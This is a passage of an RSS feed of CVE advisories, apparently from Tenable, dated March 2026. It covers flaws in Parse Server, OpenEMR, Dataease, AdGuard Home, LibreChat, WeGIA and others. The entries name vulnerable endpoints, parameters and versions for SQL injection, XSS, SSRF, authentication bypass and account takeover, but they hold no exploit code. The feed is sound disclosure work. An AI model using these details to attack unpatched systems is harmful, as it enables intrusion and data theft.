      <p>Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to 9.6.0-alpha.12 and 8.6.38, an unauthenticated attacker can take over any user account that was created with an authentication provider that does not validate the format of the user identifier (e.g. anonymous authentication). By sending a crafted login request, the attacker can cause the server to perform a pattern-matching query instead of an exact-match lookup, allowing the attacker to match an existing user and obtain a valid session token for that user's account. Both MongoDB and PostgreSQL database backends are affected. Any Parse Server deployment that allows anonymous authentication (enabled by default) is vulnerable. This vulnerability is fixed in 9.6.0-alpha.12 and 8.6.38.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32248">https://www.tenable.com/cve/CVE-2026-32248</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32242]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32242</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32242</guid>
            <pubDate>Thu, 12 Mar 2026 19:16:19 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to 9.6.0-alpha.11 and 8.6.37, Parse Server's built-in OAuth2 auth adapter exports a singleton instance that is reused directly across all OAuth2 provider configurations. Under concurrent authentication requests for different OAuth2 providers, one provider's token validation may execute using another provider's configuration, potentially allowing a token that should be rejected by one provider to be accepted because it is validated against a different provider's policy. Deployments that configure multiple OAuth2 providers via the oauth2: true flag are affected. This vulnerability is fixed in 9.6.0-alpha.11 and 8.6.37.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32242">https://www.tenable.com/cve/CVE-2026-32242</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32234]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32234</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32234</guid>
            <pubDate>Wed, 11 Mar 2026 20:16:18 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to 9.6.0-alpha.10 and 8.6.36, an attacker with access to the master key can inject malicious SQL via crafted field names used in query constraints when Parse Server is configured with PostgreSQL as the database. The field name in a $regex query operator is passed to PostgreSQL using unparameterized string interpolation, allowing the attacker to manipulate the SQL query. While the master key controls what can be done through the Parse Server abstraction layer, this SQL injection bypasses Parse Server entirely and operates at the database level. This vulnerability only affects Parse Server deployments using PostgreSQL. This vulnerability is fixed in 9.6.0-alpha.10 and 8.6.36.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32234">https://www.tenable.com/cve/CVE-2026-32234</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32230]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32230</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32230</guid>
            <pubDate>Thu, 12 Mar 2026 19:16:16 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Uptime Kuma is an open source, self-hosted monitoring tool. From 2.0.0 to 2.1.3, the GET /api/badge/:id/ping/:duration? endpoint in server/routers/api-router.js does not verify that the requested monitor belongs to a public group. All other badge endpoints check AND public = 1 in their SQL query before returning data. The ping endpoint skips this check entirely, allowing unauthenticated users to extract average ping/response time data for private monitors. This vulnerability is fixed in 2.2.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32230">https://www.tenable.com/cve/CVE-2026-32230</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32141]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32141</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32141</guid>
            <pubDate>Thu, 12 Mar 2026 18:16:25 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>flatted is a circular JSON parser. Prior to 3.4.0, flatted's parse() function uses a recursive revive() phase to resolve circular references in deserialized JSON. When given a crafted payload with deeply nested or self-referential $ indices, the recursion depth is unbounded, causing a stack overflow that crashes the Node.js process. This vulnerability is fixed in 3.4.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32141">https://www.tenable.com/cve/CVE-2026-32141</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32140]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32140</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32140</guid>
            <pubDate>Thu, 12 Mar 2026 18:16:25 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Dataease is an open source data visualization analysis tool. Prior to 2.10.20, by controlling the IniFile parameter, an attacker can force the JDBC driver to load an attacker-controlled configuration file. This configuration file can inject dangerous JDBC properties, leading to remote code execution. The Redshift JDBC driver execution flow reaches a method named getJdbcIniFile. The getJdbcIniFile method implements an aggressive automatic configuration file discovery mechanism. If not explicitly restricted, it searches for a file named rsjdbc.ini. In a JDBC URL context, users can explicitly specify the configuration file via URL parameters, which allows arbitrary files on the server to be loaded as JDBC configuration files. Within the Redshift JDBC driver properties, the parameter IniFile is explicitly supported and used to load an external configuration file. This vulnerability is fixed in 2.10.20.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32140">https://www.tenable.com/cve/CVE-2026-32140</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32139]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32139</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32139</guid>
            <pubDate>Thu, 12 Mar 2026 18:16:25 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Dataease is an open source data visualization analysis tool. In DataEase 2.10.19 and earlier, the static resource upload interface allows SVG uploads. However, backend validation only checks whether the XML is parseable and whether the root node is svg. It does not sanitize active content such as onload/onerror event handlers or script-capable attributes. As a result, an attacker can upload a malicious SVG and then trigger script execution in a browser by visiting the exposed static resource URL, forming a full stored XSS exploitation chain. This vulnerability is fixed in 2.10.20.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32139">https://www.tenable.com/cve/CVE-2026-32139</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32137]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32137</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32137</guid>
            <pubDate>Thu, 12 Mar 2026 18:16:25 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Dataease is an open source data visualization analysis tool. Prior to 2.10.20, the table parameter for /de2api/datasource/previewData is directly concatenated into the SQL statement without any filtering or parameterization. Since tableName is a user-controllable string, attackers can inject malicious SQL statements by constructing malicious table names. This vulnerability is fixed in 2.10.20.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32137">https://www.tenable.com/cve/CVE-2026-32137</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32136]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32136</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32136</guid>
            <pubDate>Wed, 11 Mar 2026 22:16:33 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>AdGuard Home is a network-wide software for blocking ads and tracking. Prior to 0.107.73, an unauthenticated remote attacker can bypass all authentication in AdGuardHome by sending an HTTP/1.1 request that requests an upgrade to HTTP/2 cleartext (h2c). Once the upgrade is accepted, the resulting HTTP/2 connection is handled by the inner mux, which has no authentication middleware attached. All subsequent HTTP/2 requests on that connection are processed as fully authenticated, regardless of whether any credentials were provided. This vulnerability is fixed in 0.107.73.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32136">https://www.tenable.com/cve/CVE-2026-32136</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32133]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32133</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32133</guid>
            <pubDate>Wed, 11 Mar 2026 22:16:33 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>2FAuth is a web app to manage Two-Factor Authentication (2FA) accounts and generate their security codes. Prior to 6.1.0, a blind SSRF vulnerability exists in 2FAuth that allows authenticated users to make arbitrary HTTP requests from the server to internal networks and cloud metadata endpoints. The image parameter in the OTP URL is not properly validated for internal / private IP addresses before HTTP requests are made. While the previous fix added response validation to ensure only valid images are stored, the HTTP request is still made to arbitrary URLs before this validation occurs. This vulnerability is fixed in 6.1.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32133">https://www.tenable.com/cve/CVE-2026-32133</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32127]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32127</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32127</guid>
            <pubDate>Wed, 11 Mar 2026 21:16:18 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>OpenEMR is a free and open source electronic health records and medical practice management application. Prior to 8.0.0.1, OpenEMR contains a SQL injection vulnerability in the ajax graphs library that can be exploited by authenticated attackers. The vulnerability exists due to insufficient input validation in the ajax graphs library. This vulnerability is fixed in 8.0.0.1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32127">https://www.tenable.com/cve/CVE-2026-32127</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32126]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32126</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32126</guid>
            <pubDate>Wed, 11 Mar 2026 21:16:18 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>OpenEMR is a free and open source electronic health records and medical practice management application. Prior to 8.0.0.1, an inverted boolean condition in ControllerRouter::route() causes the admin/super ACL check to be enforced only for controllers that already have their own internal authorization (review, log), while leaving all other CDR controllers — alerts, ajax, edit, add, detail, browse — accessible to any authenticated user. This allows any logged-in user to suppress clinical decision support alerts system-wide, delete or modify clinical plans, and edit rule configurations — all operations intended to require administrator privileges. This vulnerability is fixed in 8.0.0.1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32126">https://www.tenable.com/cve/CVE-2026-32126</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32125]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32125</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32125</guid>
            <pubDate>Wed, 11 Mar 2026 21:16:18 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>OpenEMR is a free and open source electronic health records and medical practice management application. Prior to 8.0.0.1, track/item names from the Track Anything feature are stored from user input (POST) and later rendered in Dygraph charts (titles/labels) using innerHTML or equivalent without escaping. A user who can create or edit Track Anything items can inject script that runs when any user views the corresponding graph. This vulnerability is fixed in 8.0.0.1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32125">https://www.tenable.com/cve/CVE-2026-32125</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32124]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32124</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32124</guid>
            <pubDate>Wed, 11 Mar 2026 21:16:18 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>OpenEMR is a free and open source electronic health records and medical practice management application. Prior to 8.0.0.1, the dynamic code picker AJAX endpoint returns code descriptions (code_text) that are rendered in the front end (e.g. DataTables) without HTML escaping. If an administrator (or user with code management rights) creates or edits a code with a malicious description containing script, that script runs in the browser of every user who uses the picker. This vulnerability is fixed in 8.0.0.1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32124">https://www.tenable.com/cve/CVE-2026-32124</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32123]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32123</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32123</guid>
            <pubDate>Wed, 11 Mar 2026 21:16:18 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>OpenEMR is a free and open source electronic health records and medical practice management application. Prior to 8.0.0.1, sensitivity checks for group encounters are broken because the code only consults form_encounter for sensitivity, while group encounters store sensitivity in form_groups_encounter. As a result, sensitivity is never correctly applied to group encounters, and users who should be restricted from viewing sensitive (e.g. mental health) encounters can view them. This vulnerability is fixed in 8.0.0.1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32123">https://www.tenable.com/cve/CVE-2026-32123</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32122]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32122</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32122</guid>
            <pubDate>Wed, 11 Mar 2026 21:16:17 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>OpenEMR is a free and open source electronic health records and medical practice management application. Prior to 8.0.0.1, the Claim File Tracker feature exposes an AJAX endpoint that returns billing claim metadata (claim IDs, payer info, transmission logs). The endpoint does not enforce the same ACL as the main billing/claims workflow, so authenticated users without appropriate billing permissions can access this data. This vulnerability is fixed in 8.0.0.1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32122">https://www.tenable.com/cve/CVE-2026-32122</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32121]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32121</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32121</guid>
            <pubDate>Wed, 11 Mar 2026 21:16:17 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>OpenEMR is a free and open source electronic health records and medical practice management application. Prior to 8.0.0.1, a stored XSS vulnerability exists in the prescription CSS/HTML print view via patient demographics. That finding involves server-side rendering of patient names via raw PHP echo. This finding involves client-side DOM-based rendering via jQuery .html() in a completely different component (portal/sign/assets/signer_api.js). The two share the same root cause (unsanitized patient names in patient_data), but they have different sinks, different affected components, different trigger actions, and require independent fixes. This vulnerability is fixed in 8.0.0.1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32121">https://www.tenable.com/cve/CVE-2026-32121</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32118]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32118</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32118</guid>
            <pubDate>Wed, 11 Mar 2026 21:16:17 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>OpenEMR is a free and open source electronic health records and medical practice management application. Prior to 8.0.0.1, stored cross-site scripting (XSS) in the Graphical Pain Map ("clickmap") form allows any authenticated clinician to inject arbitrary JavaScript that executes in the browser of every subsequent user who views the affected encounter form. Because session cookies are not marked HttpOnly, this enables full session hijacking of other users, including administrators. This vulnerability is fixed in 8.0.0.1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32118">https://www.tenable.com/cve/CVE-2026-32118</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32110]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32110</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32110</guid>
            <pubDate>Wed, 11 Mar 2026 21:16:17 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>SiYuan is a personal knowledge management system. Prior to 3.6.0, the /api/network/forwardProxy endpoint allows authenticated users to make arbitrary HTTP requests from the server. The endpoint accepts a user-controlled URL and makes HTTP requests to it, returning the full response body and headers. There is no URL validation to prevent requests to internal networks, localhost, or cloud metadata services. This vulnerability is fixed in 3.6.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32110">https://www.tenable.com/cve/CVE-2026-32110</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32109]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32109</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32109</guid>
            <pubDate>Wed, 11 Mar 2026 21:16:16 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Copyparty is a portable file server. Prior to 1.20.12, if an attacker has been given both read- and write-permissions to the server, they can upload a malicious file with the filename .prologue.html and then craft a link to potentially execute arbitrary JavaScript in the victim's context. Note that it is intended behavior that the JavaScript would execute if the target clicks a link to the HTML file itself; "https://example.com/foo/.prologue.html". The vulnerability is that "https://example.com/foo/?b" would also evaluate the file, making the behavior unexpected. There are existing preventative measures (strict SameSite cookies) which make it harder to leverage this vulnerability in an attack; in order to gain control of the target's authenticated session, the link must be clicked from a page served by the server itself -- most likely by editing an existing resource, which would require additional access permissions. Finally, for this attack to be successful, the attacker's target must click the specific crafted link given by the attacker. This vulnerability is not activated by normally browsing the web-UI on the server. This vulnerability is fixed in 1.20.12.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32109">https://www.tenable.com/cve/CVE-2026-32109</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32108]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32108</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32108</guid>
            <pubDate>Wed, 11 Mar 2026 21:16:16 GMT</pubDate>
            <description><![CDATA[
      <p>Low Severity</p>

      <h3>Description</h3>
      <p>Copyparty is a portable file server. Prior to 1.20.12, there was a missing permission-check in the shares feature (the shr global-option). This vulnerability only applies when the shares feature is used for the specific purpose of creating a share of just a single file inside a folder or either the FTP or SFTP server is enabled, and also made publicly accessible. Given these conditions, when a user is browsing a share through either FTP or SFTP (not http or https), they can gain read-access to the remaining files inside the shared folder by guessing/bruteforcing the filenames. It was not possible to descend into subdirectories in this manner; only the sibling files were accessible. This vulnerability is similar to CVE-2025-58753 which was previously fixed for HTTP and HTTPS, but not for FTP. The FTPS server did not yet exist at that time. This vulnerability is fixed in 1.20.12.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32108">https://www.tenable.com/cve/CVE-2026-32108</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32098]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32098</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32098</guid>
            <pubDate>Wed, 11 Mar 2026 20:16:18 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to 9.6.0-alpha.9 and 8.6.35, an attacker can exploit LiveQuery subscriptions to infer the values of protected fields without directly receiving them. By subscribing with a WHERE clause that references a protected field (including via dot-notation or $regex), the attacker can observe whether LiveQuery events are delivered for matching objects. This creates a boolean oracle that leaks protected field values. The attack affects any class that has both protectedFields configured in Class-Level Permissions and LiveQuery enabled. This vulnerability is fixed in 9.6.0-alpha.9 and 8.6.35.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32098">https://www.tenable.com/cve/CVE-2026-32098</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31949]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31949</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31949</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:39 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>LibreChat is a ChatGPT clone with additional features. Prior to 0.8.3-rc1, a Denial of Service (DoS) vulnerability exists in the DELETE /api/convos endpoint that allows an authenticated attacker to crash the Node.js server process by sending malformed requests. The DELETE /api/convos route handler attempts to destructure req.body.arg without validating that it exists. The server crashes due to an unhandled TypeError that bypasses Express error handling middleware and triggers process.exit(1). This vulnerability is fixed in 0.8.3-rc1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31949">https://www.tenable.com/cve/CVE-2026-31949</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31944]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31944</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31944</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:39 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>LibreChat is a ChatGPT clone with additional features. From 0.8.2 to 0.8.2-rc3, the MCP (Model Context Protocol) OAuth callback endpoint accepts the redirect from the identity provider and stores OAuth tokens for the user who initiated the flow, without verifying that the browser hitting the redirect URL is logged in or that the logged-in user matches the initiator. An attacker can send the authorization URL to a victim; when the victim completes the flow, the victim’s OAuth tokens are stored on the attacker’s LibreChat account, enabling account takeover of the victim’s MCP-linked services (e.g. Atlassian, Outlook). This vulnerability is fixed in 0.8.3-rc1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31944">https://www.tenable.com/cve/CVE-2026-31944</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31922]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31922</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31922</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:39 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Ays Pro Fox LMS fox-lms allows Blind SQL Injection. This issue affects Fox LMS: from n/a through <= 1.0.6.3.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31922">https://www.tenable.com/cve/CVE-2026-31922</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31919]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31919</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31919</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:39 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in Josh Kohlbach Advanced Coupons for WooCommerce Coupons advanced-coupons-for-woocommerce-free allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Advanced Coupons for WooCommerce Coupons: from n/a through <= 4.7.1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31919">https://www.tenable.com/cve/CVE-2026-31919</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31918]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31918</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31918</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:39 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in immonex immonex Kickstart immonex-kickstart allows Stored XSS. This issue affects immonex Kickstart: from n/a through <= 1.13.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31918">https://www.tenable.com/cve/CVE-2026-31918</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31917]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31917</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31917</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:38 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in weDevs WP ERP erp allows SQL Injection. This issue affects WP ERP: from n/a through <= 1.16.10.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31917">https://www.tenable.com/cve/CVE-2026-31917</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31916]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31916</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31916</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:38 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in Iulia Cazan Latest Post Shortcode latest-post-shortcode allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Latest Post Shortcode: from n/a through <= 14.2.1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31916">https://www.tenable.com/cve/CVE-2026-31916</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31915]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31915</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31915</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:38 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in UX-themes Flatsome flatsome allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Flatsome: from n/a through <= 3.19.6.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31915">https://www.tenable.com/cve/CVE-2026-31915</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31901]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31901</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31901</guid>
            <pubDate>Wed, 11 Mar 2026 20:16:16 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to 8.6.34 and 9.6.0-alpha.8, the email verification endpoint (/verificationEmailRequest) returns distinct error responses depending on whether an email address belongs to an existing user, is already verified, or does not exist. An attacker can send requests with different email addresses and observe the error codes to determine which email addresses are registered in the application. This is a user enumeration vulnerability that affects any Parse Server deployment with email verification enabled (verifyUserEmails: true). This vulnerability is fixed in 8.6.34 and 9.6.0-alpha.8.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31901">https://www.tenable.com/cve/CVE-2026-31901</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31899]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31899</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31899</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:38 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>CairoSVG is an SVG converter based on Cairo, a 2D graphics library. Prior to Kozea/CairoSVG has exponential denial of service via recursive <use> element amplification in cairosvg/defs.py. This causes CPU exhaustion from a small input.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31899">https://www.tenable.com/cve/CVE-2026-31899</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31897]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31897</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31897</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:38 GMT</pubDate>
            <description><![CDATA[
      <p>Info Severity</p>

      <h3>Description</h3>
      <p>FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.24.0, there is an out-of-bounds read in freerdp_bitmap_decompress_planar when SrcSize is 0. The function dereferences *srcp (which points to pSrcData) without first verifying that SrcSize >= 1. When SrcSize is 0 and pSrcData is non-NULL, this reads one byte past the end of the source buffer. This vulnerability is fixed in 3.24.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31897">https://www.tenable.com/cve/CVE-2026-31897</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31896]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31896</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31896</guid>
            <pubDate>Wed, 11 Mar 2026 20:16:15 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>WeGIA is a web manager for charitable institutions. Prior to version 3.6.6, a critical SQL injection vulnerability exists in the WeGIA application. The remover_produto_ocultar.php script uses extract($_REQUEST) to populate local variables and then directly concatenates these variables into a SQL query executed via PDO::query. This allows an authenticated (or auth-bypassed) attacker to execute arbitrary SQL commands. This can be used to exfiltrate sensitive data from the database or, as demonstrated in this PoC, cause a time-based delay (denial of service). This vulnerability is fixed in 3.6.6.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31896">https://www.tenable.com/cve/CVE-2026-31896</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31895]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-31895</link>
            <guid>https://www.tenable.com/cve/CVE-2026-31895</guid>
            <pubDate>Wed, 11 Mar 2026 20:16:15 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>WeGIA is a web manager for charitable institutions. Prior to version 3.6.6, WeGIA (Web gerenciador para instituições assistenciais) contains a SQL injection vulnerability in html/matPat/restaurar_produto.php. The id_produto parameter from $_GET is directly interpolated into SQL queries without parameterization or sanitization. This vulnerability is fixed in 3.6.6.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-31895">https://www.tenable.com/cve/CVE-2026-31895</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-31894]]></title>
